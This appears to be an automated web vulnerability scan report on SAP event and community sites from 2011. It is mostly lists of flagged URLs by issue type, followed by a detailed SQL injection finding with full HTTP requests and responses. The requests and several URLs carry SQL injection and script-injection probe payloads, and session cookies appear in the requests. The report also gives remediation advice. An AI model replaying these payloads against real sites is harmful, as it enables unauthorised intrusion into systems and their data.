12.137. http://www.sapvirtualevents.com/js/timetable.js

12.138. http://www.sapvirtualevents.com/js/utility.js

12.139. http://www.sapvirtualevents.com/js/vscrollarea.js

12.140. http://www.sapvirtualevents.com/teched

12.141. http://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/webcontent/uuid/a039063f-0894-2b10-ef89-c40583db85cd

12.142. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/104c3912-cf92-2d10-7bab-b4bb160f7154

12.143. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180

12.144. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f

12.145. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0

12.146. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4

12.147. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.application!2fcom.sap.sdn.folder.roles!2fcom.sap.sdn.folder.navigationroles!2fcom.sap.sdn.folder.scn!2fcom.sap.sdn.role.anonymous!2fcom.sap.sdn.tln.workset.weblogs!2fcom.sap.sdn.tln.iview.blogs

12.148. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.sdnmain!2fcom.sap.sdn.SamlSCNLogon

12.149. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

12.150. https://www.sme.sap.com/irj/sme/cpslogon

13. Password field with autocomplete enabled

13.1. https://sapphire-nowmadrid.sapevents.com/

13.2. https://teched2011madrid.sapevents.com/

13.3. https://teched2011madrid.sapevents.com/index.cfm

13.4. http://www.asugonline.com/cms/FormBuilder/Register.aspx

13.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

13.6. https://www.sap.com/contactsap/index.epx

13.7. https://www.sap.com/profile/login.epx

13.8. https://www.sap.com/profile/slogin.epx

13.9. https://www.sap.com/profile/slogin.epx

13.10. https://www.sap.com/sme/contactsap/index.epx

13.11. http://www.sapbusinessoptimizer.com/

13.12. http://www.sapphirenow.com/login.aspx

13.13. http://www.sapphirenow.com/login.aspx

13.14. http://www.sapphirenow.com/login.aspx

13.15. http://www.sapphirenow.com/login.aspx

13.16. http://www.sapvirtualevents.com/teched/login.aspx

13.17. http://www.sapvirtualevents.com/teched/login.aspx

13.18. http://www.sapvirtualevents.com/teched/login.aspx

13.19. http://www.sdn.sap.com/irj/scn/advancedsearch

13.20. http://www.sdn.sap.com/irj/scn/downloads

13.21. http://www.sdn.sap.com/irj/scn/index

13.22. http://www.sdn.sap.com/irj/scn/logon

13.23. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts

13.24. http://www.sdn.sap.com/irj/scn/weblogs

13.25. http://www.sdn.sap.com/irj/scn/weblogs

13.26. http://www.sdn.sap.com/irj/scn/weblogs

13.27. http://www.sdn.sap.com/irj/scn/weblogs

13.28. http://www.sdn.sap.com/irj/sdn/logon

13.29. http://www.sdn.sap.com/irj/sdn/mypoints

13.30. https://www.sme.sap.com/irj/sme/logon

13.31. https://www.sme.sap.com/irj/sme/logon

13.32. https://www.sme.sap.com/irj/sme/logon

13.33. https://www.sme.sap.com/irj/sme/logon

13.34. https://www.sme.sap.com/irj/sme/logon

13.35. https://www.sme.sap.com/irj/sme/memberlogin

13.36. https://www.sme.sap.com/irj/sme/memberlogin

14. Source code disclosure

14.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

14.2. https://www.sme.sap.com/irj/sme/logon

14.3. https://www.sme.sap.com/irj/sme/memberlogin

15. Referer-dependent response

15.1. http://www.facebook.com/plugins/like.php

15.2. http://www.sap.com/about-sap/events/worldtour/index.epx

15.3. http://www.sap.com/gwtservices/verifylogin.epx

15.4. http://www.sap.com/index.epx

15.5. https://www.sap.com/profile/login.epx

15.6. https://www.sap.com/profile/slogin.epx

15.7. https://www.sap.com/sme/contactsap/index.epx

16. Cross-domain POST

16.1. http://info.newsgator.com/Trial_SocialSites2010.html

16.2. http://weblogs.sdn.sap.com/pub/t/27

17. Cross-domain Referer leakage

17.1. http://forums.sdn.sap.com/forum.jspa

17.2. http://forums.sdn.sap.com/thread.jspa

17.3. http://info.newsgator.com/Trial_SocialSites2010.html

17.4. http://reservoir.marketstudio.net/reservoir

17.5. http://smepartnerfinder.sap.com/FlashIFrame.aspx

17.6. http://store.businessobjects.com/DRHM/store

17.7. http://store.businessobjects.com/DRHM/store

17.8. http://store.businessobjects.com/DRHM/store

17.9. http://store.businessobjects.com/DRHM/store

17.10. http://store.businessobjects.com/DRHM/store

17.11. http://store.businessobjects.com/DRHM/store

17.12. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

17.13. https://teched2011madrid.sapevents.com/index.cfm

17.14. http://www.connect.facebook.com/widgets/fan.php

17.15. http://www.connect.facebook.com/widgets/fan.php

17.16. http://www.connect.facebook.com/widgets/fan.php

17.17. http://www.newsgator.com/Default.aspx

17.18. http://www.sap.com/buy-now/index.epx

17.19. http://www.sap.com/customer-showcase/innovation/index.epx

17.20. http://www.sap.com/customer-testimonials/index.epx

17.21. http://www.sap.com/gwtservices/httpBridge.epx

17.22. http://www.sap.com/lines-of-business/index.epx

17.23. http://www.sap.com/news-reader/index.epx

17.24. http://www.sap.com/news-reader/index.epx

17.25. http://www.sap.com/sme/search/index.epx

17.26. http://www.sap.com/zzzzzz=yyyyy

17.27. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

17.28. https://www.sap.com/contactsap/index.epx

17.29. https://www.sap.com/host.epx

17.30. https://www.sap.com/profile/login.epx

17.31. https://www.sap.com/profile/slogin.epx

17.32. http://www.sapphirenow.com/login.aspx

17.33. http://www.sapphirenow.com/login.aspx

17.34. http://www.sapphirenow.com/login.aspx

17.35. http://www.sapphirenow.com/login.aspx

17.36. http://www.sapphirenow.com/login.aspx

17.37. http://www.sapphirenow.com/login.aspx

17.38. http://www.sapphirenow.com/login.aspx

17.39. http://www.sapphirenow.com/login.aspx

17.40. http://www.sapphirenow.com/login.aspx

17.41. http://www.sapvirtualevents.com/teched/default.aspx

17.42. http://www.sapvirtualevents.com/teched/login.aspx

17.43. http://www.sdn.sap.com/irj/scn/advancedsearch

17.44. http://www.sdn.sap.com/irj/scn/weblogs

18. Cross-domain script include

18.1. http://ecohub.sap.com/

18.2. http://forums.sdn.sap.com/forum.jspa

18.3. http://forums.sdn.sap.com/thread.jspa

18.4. http://info.newsgator.com/Trial_SocialSites2010.html

18.5. http://store.businessobjects.com/DRHM/store

18.6. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800

18.7. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

18.8. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

18.9. http://weblogs.sdn.sap.com/pub/q/top_weblogs

18.10. http://weblogs.sdn.sap.com/pub/t/27

18.11. http://weblogs.sdn.sap.com/pub/u/12750

18.12. http://weblogs.sdn.sap.com/pub/u/18577

18.13. http://weblogs.sdn.sap.com/pub/u/1915

18.14. http://weblogs.sdn.sap.com/pub/u/251694270

18.15. http://weblogs.sdn.sap.com/pub/u/251714417

18.16. http://weblogs.sdn.sap.com/pub/u/251739236

18.17. http://weblogs.sdn.sap.com/pub/u/251752730

18.18. http://weblogs.sdn.sap.com/pub/u/251779844

18.19. http://weblogs.sdn.sap.com/pub/u/251804053

18.20. http://weblogs.sdn.sap.com/pub/u/251822835

18.21. http://weblogs.sdn.sap.com/pub/u/251835793

18.22. http://weblogs.sdn.sap.com/pub/u/251875405

18.23. http://weblogs.sdn.sap.com/pub/u/251878923

18.24. http://weblogs.sdn.sap.com/pub/u/251902878

18.25. http://weblogs.sdn.sap.com/pub/u/251903803

18.26. http://weblogs.sdn.sap.com/pub/u/252016780

18.27. http://weblogs.sdn.sap.com/pub/u/252043411

18.28. http://weblogs.sdn.sap.com/pub/u/252043838

18.29. http://weblogs.sdn.sap.com/pub/u/252045742

18.30. http://weblogs.sdn.sap.com/pub/u/252046418

18.31. http://weblogs.sdn.sap.com/pub/u/252053025

18.32. http://weblogs.sdn.sap.com/pub/u/252086107

18.33. http://weblogs.sdn.sap.com/pub/u/252102451

18.34. http://weblogs.sdn.sap.com/pub/u/252129929

18.35. http://weblogs.sdn.sap.com/pub/u/252147393

18.36. http://weblogs.sdn.sap.com/pub/u/252158907

18.37. http://weblogs.sdn.sap.com/pub/u/252196257

18.38. http://weblogs.sdn.sap.com/pub/u/33798

18.39. http://weblogs.sdn.sap.com/pub/u/35460

18.40. http://weblogs.sdn.sap.com/pub/u/35583

18.41. http://weblogs.sdn.sap.com/pub/u/43450

18.42. http://weblogs.sdn.sap.com/pub/u/48024

18.43. http://weblogs.sdn.sap.com/pub/u/5263

18.44. http://weblogs.sdn.sap.com/pub/u/8228

18.45. http://weblogs.sdn.sap.com/pub/wlg/26917

18.46. https://weblogs.sdn.sap.com/pub/q/top_weblogs

18.47. http://www.connect.facebook.com/widgets/fan.php

18.48. http://www.newsgator.com/

18.49. http://www.newsgator.com/Default.aspx

18.50. http://www.newsgator.com/customers.aspx

18.51. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx

18.52. http://www.newsgator.com/partners/channel-partners.aspx

18.53. http://www.newsgator.com/products/social-sites-for-sharepoint-2007-moss.aspx

18.54. http://www.newsgator.com/products/tomoye.aspx

18.55. http://www.sapandasug.com/

18.56. http://www.sapbusinessoptimizer.com/

18.57. http://www.sapphirenow.com/login.aspx

18.58. http://www.sapphirenow.com/login.aspx

18.59. http://www.sapphirenow.com/login.aspx

18.60. http://www.sapphirenow.com/login.aspx

18.61. http://www.sapphirenow.com/login.aspx

18.62. http://www.sapphirenow.com/login.aspx

18.63. http://www.sapphirenow.com/login.aspx

18.64. http://www.sapphirenow.com/login.aspx

18.65. http://www.sapphirenow.com/login.aspx

18.66. http://www.sapphirenow.com/login.aspx

18.67. http://www.sapphirenow.com/madrid/

18.68. http://www.sapphirenow.com/madrid/player.html

18.69. http://www.sapteched.com/china/11/cn/index/home.asp

18.70. http://www.sapteched.com/emea/about/whoshouldattend.htm

18.71. http://www.sapteched.com/emea/reghotel/home.htm

18.72. http://www.sapvirtualevents.com/teched/

18.73. http://www.sapvirtualevents.com/teched/Sessions.aspx

18.74. http://www.sapvirtualevents.com/teched/default.aspx

18.75. http://www.sapvirtualevents.com/teched/login.aspx

18.76. http://www.sapvirtualevents.com/teched/sessiondetails.aspx

18.77. http://www.sdn.sap.com/irj/scn/downloads

18.78. http://www.sdn.sap.com/irj/scn/index

19. Email addresses disclosed

19.1. http://news.google.com/

19.2. http://nmp.newsgator.com/NGBuzz/4297/load.ashx/buzz

19.3. https://sapphire-nowmadrid.sapevents.com/

19.4. http://scripts.omniture.com/javascript.js

19.5. http://smepartnerfinder.sap.com/en/

19.6. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx

19.7. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx

19.8. http://store.businessobjects.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/js/functionsandplugins.js

19.9. https://teched2011madrid.sapevents.com/

19.10. https://teched2011madrid.sapevents.com/index.cfm

19.11. http://weblogs.sdn.sap.com/pub/u/251903803

19.12. http://www.asugonline.com/weborb.aspx

19.13. http://www.asugonline.com/weborb.aspx

19.14. http://www.newsgator.com/Default.aspx

19.15. http://www.newsgator.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

19.16. http://www.newsgator.com/Resources/Shared/scripts/widgets.js

19.17. http://www.newsgator.com/partners/become-a-newsgator-partner.aspx

19.18. http://www.newsgator.com/partners/channel-partners.aspx

19.19. http://www.sap.com/about-sap/company/legal/privacy.epx

19.20. http://www.sap.com/about-sap/events/worldtour/index.epx

19.21. http://www.sap.com/news-reader/index.epx

19.22. http://www.sap.com/news-reader/index.epx

19.23. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

19.24. http://www.sap.com/sme/howtobuy/solution_adviser.epx

19.25. http://www.sap.com/sme/partners/findpartner/index.epx

19.26. http://www.sap.com/sme/search/index.epx

19.27. http://www.sap.com/sme/seeitinaction/customerreferences.epx

19.28. http://www.sap.com/sme/seeitinaction/index.epx

19.29. http://www.sap.com/sme/seeitinaction/overviewvideos.epx

19.30. http://www.sap.com/sme/seeitinaction/seealldemos.epx

19.31. http://www.sap.com/sme/seeitinaction/solutiondemos.epx

19.32. http://www.sap.com/sme/solutions/businessmanagement/index.epx

19.33. https://www.sap.com/sme/contactsap/index.epx

19.34. http://www.sapandasug.com/

19.35. http://www.sapandasug.com/virtual/

19.36. http://www.sapbusinessoptimizer.com/

19.37. http://www.sapphirenow.com/login.aspx

19.38. http://www.sapphirenow.com/madrid/js/jquery.colorbox.js

19.39. http://www.sapteched.com/china/11/cn/index/home.asp

19.40. http://www.sapteched.com/emea/about/whoshouldattend.htm

19.41. http://www.sapteched.com/emea/reghotel/home.htm

19.42. http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm

19.43. http://www.sapvirtualevents.com/teched/login.aspx

19.44. http://www.sdn.sap.com/irj/scn/bc

19.45. https://www.sme.sap.com/irj/portalapps/com.sap.nw.wpc.cssservice/scripts/jquery/jquery.colorbox-min.js

19.46. https://www.sme.sap.com/irj/sme/logon

19.47. https://www.sme.sap.com/irj/sme/memberlogin

20. Private IP addresses disclosed

20.1. http://static.ak.connect.facebook.com/connect.php/en_US

20.2. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

20.3. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.5. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/P26mJw_1uq9.js

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/7duzuvStMWK.css

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

20.9. http://store.businessobjects.com/DRHM/store

20.10. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.%2077298800

20.11. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800

20.12. http://store.businessobjects.com/store/bobjamer/en_US/DisplayCategoryProductListPage/categoryID.57066000/parentCategoryID.57065700

20.13. http://wiki.sdn.sap.com/wiki/display/events/SAP+TechEd

20.14. https://wiki.sdn.sap.com/wiki/display/HOME

20.15. http://www.connect.facebook.com/widgets/fan.php

20.16. http://www.connect.facebook.com/widgets/fan.php

20.17. http://www.connect.facebook.com/widgets/fan.php

20.18. http://www.facebook.com/extern/login_status.php

20.19. http://www.facebook.com/extern/login_status.php

20.20. http://www.facebook.com/extern/login_status.php

20.21. http://www.facebook.com/plugins/like.php

20.22. http://www.facebook.com/plugins/like.php

20.23. http://www.facebook.com/plugins/like.php

20.24. http://www.facebook.com/plugins/like.php

20.25. http://www.facebook.com/plugins/like.php

20.26. http://www.facebook.com/plugins/like.php

20.27. http://www.facebook.com/plugins/like.php

20.28. http://www.facebook.com/plugins/like.php

20.29. http://www.facebook.com/plugins/like.php

20.30. http://www.facebook.com/plugins/like.php

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.facebook.com/plugins/like.php

20.33. http://www.facebook.com/plugins/like.php

20.34. http://www.facebook.com/plugins/like.php

20.35. http://www.facebook.com/plugins/like.php

20.36. http://www.facebook.com/plugins/like.php

20.37. http://www.facebook.com/plugins/like.php

20.38. http://www.facebook.com/plugins/like.php

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.facebook.com/plugins/like.php

20.41. http://www.facebook.com/plugins/like.php

20.42. http://www.facebook.com/plugins/like.php

20.43. http://www.facebook.com/plugins/like.php

20.44. http://www.facebook.com/plugins/like.php

20.45. http://www.facebook.com/plugins/like.php

20.46. http://www.facebook.com/plugins/like.php

20.47. http://www.facebook.com/plugins/like.php

20.48. http://www.sap.com/sme/seeitinaction/index.epx

21. Robots.txt file

21.1. http://ecohub.sap.com/

21.2. http://fls.doubleclick.net/activityi

21.3. http://forums.sdn.sap.com/forum.jspa

21.4. http://l.addthiscdn.com/live/t00/250lo.gif

21.5. http://leads.demandbase.com/in.php

21.6. http://omnituremarketing.d1.sc.omtrdc.net/b/ss/omniturecom,omniturecomdev,omniturecom-2011/1/H.23.4/s07447605198249

21.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

21.8. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard

21.9. http://pixel.mathtag.com/event/js

21.10. http://pubads.g.doubleclick.net/gampad/ads

21.11. http://s.analytics.yahoo.com/p.pl

21.12. http://safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQABiEECCEEDIFBAgAAAE

21.13. http://safebrowsing.clients.google.com/safebrowsing/downloads

21.14. http://sap.112.2o7.net/b/ss/sapcommunity,sapglobal/1/H.21/s01205263920128

21.15. http://static.2mdn.net/csi/d

21.16. http://weblogs.sdn.sap.com/api/get_wlg_info

21.17. http://www.google-analytics.com/__utm.gif

21.18. http://www.sap.com/index.epx

21.19. https://www.sap.com/sme/contactsap/index.epx

21.20. http://www.sapteched.com/sapphirenowsaptechedmadrid/

21.21. http://www.sdn.sap.com/irj/scn/forum

21.22. https://www.sdn.sap.com/irj/sdn/forum

22. Cacheable HTTPS response

22.1. https://sapphire-nowmadrid.sapevents.com/

22.2. https://teched2011madrid.sapevents.com/

22.3. https://teched2011madrid.sapevents.com/index.cfm

22.4. https://weblogs.sdn.sap.com/pub/q/top_weblogs

22.5. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

22.6. https://www.sap.com/contactsap/contact_warning.epx

22.7. https://www.sap.com/contactsap/index.epx

22.8. https://www.sap.com/host.epx

22.9. https://www.sap.com/profile/login.epx

22.10. https://www.sap.com/profile/slogin.epx

22.11. https://www.sap.com/profile/warning.epx

22.12. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

22.13. https://www.sap.com/sme/contactsap/index.epx

22.14. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

22.15. https://www.sme.sap.com/irj/servlet/prt/portal/prtmode/rss/prtroot/feedserver

22.16. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

22.17. https://www.sme.sap.com/irj/sme/logon

22.18. https://www.sme.sap.com/irj/sme/memberlogin

23. HTML does not specify charset

23.1. http://fls.doubleclick.net/activityi

23.2. http://now.eloqua.com/visitor/v200/svrGP.aspx

23.3. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20

23.4. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff

23.5. http://www.sapandasug.com/favicon.ico

23.6. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css

23.7. http://www.sapbusinessoptimizer.com/favicon.ico

23.8. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

23.9. http://www.sapphirenow.com/madrid/

23.10. http://www.sapphirenow.com/madrid/Overview.html

23.11. http://www.sapphirenow.com/madrid/player.html

23.12. http://www.sapvirtualevents.com/JControls/Header/template/header.htm

23.13. http://www.sapvirtualevents.com/JControls/News/template/SAPNews.htm

23.14. http://www.sapvirtualevents.com/Jcontrols/Sessions/template/tabularCalMCL.htm

23.15. https://www.sme.sap.com/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html

24. Content type incorrectly stated

24.1. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

24.2. http://now.eloqua.com/visitor/v200/svrGP.aspx

24.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

24.4. http://sales.liveperson.net/hcp/html/mTag.js

24.5. https://sales.liveperson.net/hcp/html/mTag.js

24.6. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

24.7. http://smepartnerfinder.sap.com/services/KeepAlive.aspx

24.8. http://smepartnerfinder.sap.com/services/LeadGeneration/Initialize.aspx

24.9. http://smepartnerfinder.sap.com/services/LeadGeneration/RegisterClick.aspx

24.10. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx

24.11. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx

24.12. http://store.businessobjects.com/DRHM/store

24.13. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js

24.14. http://weblogs.sdn.sap.com/api/get_wlg_info/

24.15. http://weblogs.sdn.sap.com/pub/q/weblogs_rss

24.16. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20

24.17. http://www.asugonline.com/config/core/gc.txt

24.18. http://www.facebook.com/extern/login_status.php

24.19. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff

24.20. http://www.sap.com/gwtservices/verifylogin.epx

24.21. http://www.sap.com/siteservice.epx

24.22. https://www.sap.com/profile/login.epx

24.23. https://www.sap.com/sme/contactsap/FormCodesRemote.epi

24.24. http://www.sapandasug.com/favicon.ico

24.25. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff

24.26. http://www.sapvirtualevents.com/JControls/Header/template/header.htm

25. Content type is not specified

25.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

25.2. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard

26. SSL certificate

26.1. https://weblogs.sdn.sap.com/

26.2. https://www.sap.com/

26.3. https://www.sdn.sap.com/



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://teched2011madrid.sapevents.com/index.cfm [error parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The error parameter appears to be vulnerable to SQL injection attacks. The payloads 15267202%20or%201%3d1--%20 and 15267202%20or%201%3d2--%20 were each submitted in the error parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?fuseaction=reg.Login&error=7515267202%20or%201%3d1--%20&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:53:41 GMT
Content-Length: 60149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<input type="Hidden" name="bASUG" value="0">
   
                                                       <tr>                                                        
                                                           <td colspan="1" class="warning" width="10">&nbsp;</td>
                                                           <td align="left" valign="top" class="warning" colspan="4"><br />
                                                               
    <img src="pics/Error.gif" border="0" align="absmiddle">&nbsp;&nbsp;&nbsp;Your form is incomplete. Please enter or correct the information in the fields below.
                                                                   <br /><br /> No e-mail address was supplied.No @ sign detected. An @ sign is part of every e-mail address.An @ sign cannot be the last character of the e-mail address.An @ sign cannot be the first character of the e-mail address.A valid e-mail address contains only one @ sign.No period detected. An e-mail address contains at least one period.The last character of the e-mail address cannot be a period.The first character of the e-mail address cannot be a period.A valid e-mail address cannot contain a comma. If you have a Compuserve account, substitute a period for the comma in your Compuserve ID, like so: <B>12345.6789@compuserve.com</B>.You cannot have a space as part of a single e-mail address.You cannot have an asterisk in an e-mail address.You cannot have a close parenthesis sign in an e-mail address.You cannot have an open parenthesis sign in an e-mail address.You cannot have a greater than sign in an e-mail address.You cannot have a less than sign in an e-mail address.You cannot have a colon in an e-mail address.You cannot have a semicolon in an e-mail address.You cannot have a double quote in an e-mail address.The person you are trying to invite is already in the Registration System.You must provide a last name.Please look for the checks below.We could not find a registration record with the confirmation number you entered.An e-mail to reset your password has been sent!You do not have access to this record!The record you are trying to access is still incomplete, please click on the Registration link and login to access your recor
...[SNIP]...

Request 2

GET /index.cfm?fuseaction=reg.Login&error=7515267202%20or%201%3d2--%20&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:53:41 GMT
Content-Length: 47815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<input type="Hidden" name="bASUG" value="0">
   <tr>
                                                               <td colspan="5" class="form-title-bar" align="Center" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                           
   <table cellspacing="1" cellpadding="3" width="100%" class="DataTable">
       <tr class="DataTableTH" align="Center" valign="Top">
           <th>Begin Registration</th>
       </tr>
       <tr class="DataTableRow01">
           <td>
               <table width="100%" border="0" bordercolor="blue" cellspacing="0" cellpadding="0" align="left">
                   <tr>
                       <td>
                   

                                               
                                                   </td>
                                                   
                                                           </tr>
                                                   <tr>
                                                               <td colspan="1" class="form-body" width="10">&nbsp;</td>
                                                           
                                                                   <td colspan="4" class="form-body" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                               <br><strong>All fields marked with an <b class="warning">*</b> are mandatory.</strong><br><br>
                                               
                                                   </td>
                                                   
                                                           </tr>
                                                   <tr>
